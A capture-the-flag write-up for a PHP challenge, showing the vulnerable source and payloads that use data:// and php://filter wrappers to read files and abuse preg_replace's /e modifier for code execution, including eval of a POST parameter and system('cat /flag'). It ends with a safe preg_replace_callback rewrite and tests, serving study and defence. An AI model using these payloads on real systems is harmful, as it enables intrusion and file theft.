[BJDCTF2020]ZJCTF,不过如此 (code execution via preg_replace in /e mode)

The challenge gives us the source:

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
// $text must be readable by file_get_contents() and equal the fixed string
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "\n\n".file_get_contents($text,'r')."\n\n\n";
    // blacklist on the file name only
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
    include($file);  //next.php
}
else{
    highlight_file(__FILE__);
}
?>

It is easy to see that the data:// and php:// wrappers get past this:

payload:?text=data://text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.php

This returns:

PD9waHAKJGlkID0gJF9HRVRbJ2lkJ107CiRfU0VTU0lPTlsnaWQnXSA9ICRpZDsKCmZ1bmN0aW9uIGNvbXBsZXgoJHJlLCAkc3RyKSB7CiAgICByZXR1cm4gcHJlZ19yZXBsYWNlKAogICAgICAgICcvKCcgLiAkcmUgLiAnKS9laScsCiAgICAgICAgJ3N0cnRvbG93ZXIoIlxcMSIpJywKICAgICAgICAkc3RyCiAgICApOwp9CgoKZm9yZWFjaCgkX0dFVCBhcyAkcmUgPT4gJHN0cikgewogICAgZWNobyBjb21wbGV4KCRyZSwgJHN0cikuICJcbiI7Cn0KCmZ1bmN0aW9uIGdldEZsYWcoKXsKCUBldmFsKCRfR0VUWydjbWQnXSk7Cn0K

Decoded:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

// /e makes preg_replace() evaluate the replacement string as PHP after
// substituting the back-reference, with both $re and $str user-controlled
function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}


// every GET key is used as the pattern, every GET value as the subject
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}
At first I didn't know what return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str); was for, so I searched on Baidu:
http://www.xinyueseo.com/websecurity/158.html

and the answer came right out. payload:

?\S*=${eval($_POST[shell])}

Or:
payload2:

?\S*=${getFlag()}&cmd=system(%27cat%20/flag%27);

Either one gets the flag.
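As an added example (not code from the original challenge or this writeup): the same complex() function rewritten with preg_replace_callback(), which hands the match to a real closure instead of eval()ing a substituted string. The function name complex_safe and the sample inputs are my own constructions.

```php
<?php
// Added example, not part of the original challenge or writeup.
// The challenge's complex() used the /e modifier, which made preg_replace()
// eval() the replacement string after back-reference substitution, so the
// user-controlled ${...} in $str became code. /e was deprecated in PHP 5.5
// and removed in PHP 7.0; preg_replace_callback() is the replacement: the
// match is handed to a PHP closure and is only ever treated as data.

function complex_safe(string $re, string $str): string
{
    // $re is still user-controlled regex syntax, as in the challenge; that is
    // a ReDoS / pattern-error risk but no longer a code-execution one.
    $result = preg_replace_callback(
        '/(' . $re . ')/i',
        function (array $m): string {
            return strtolower($m[1]); // $m[1] is plain text, never evaluated
        },
        $str
    );
    // preg_replace_callback() returns null on an invalid pattern; fail closed
    // instead of silently echoing an empty string.
    if ($result === null) {
        throw new RuntimeException('regex error code ' . preg_last_error());
    }
    return $result;
}

// Constructed inputs mirroring foreach($_GET as $re => $str) from next.php.
$cases = [
    // [GET key (pattern), GET value (subject), expected output]
    ['HELLO', 'Say HELLO World', 'Say hello World'],
    // The writeup's injection pair: now it is just lowercased text.
    ['\S*',   '${getFlag()}',    '${getflag()}'],
];
foreach ($cases as [$re, $str, $want]) {
    $got = complex_safe($re, $str);
    printf("%s %s\n", $got === $want ? 'ok  ' : 'FAIL', var_export($got, true));
}
```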
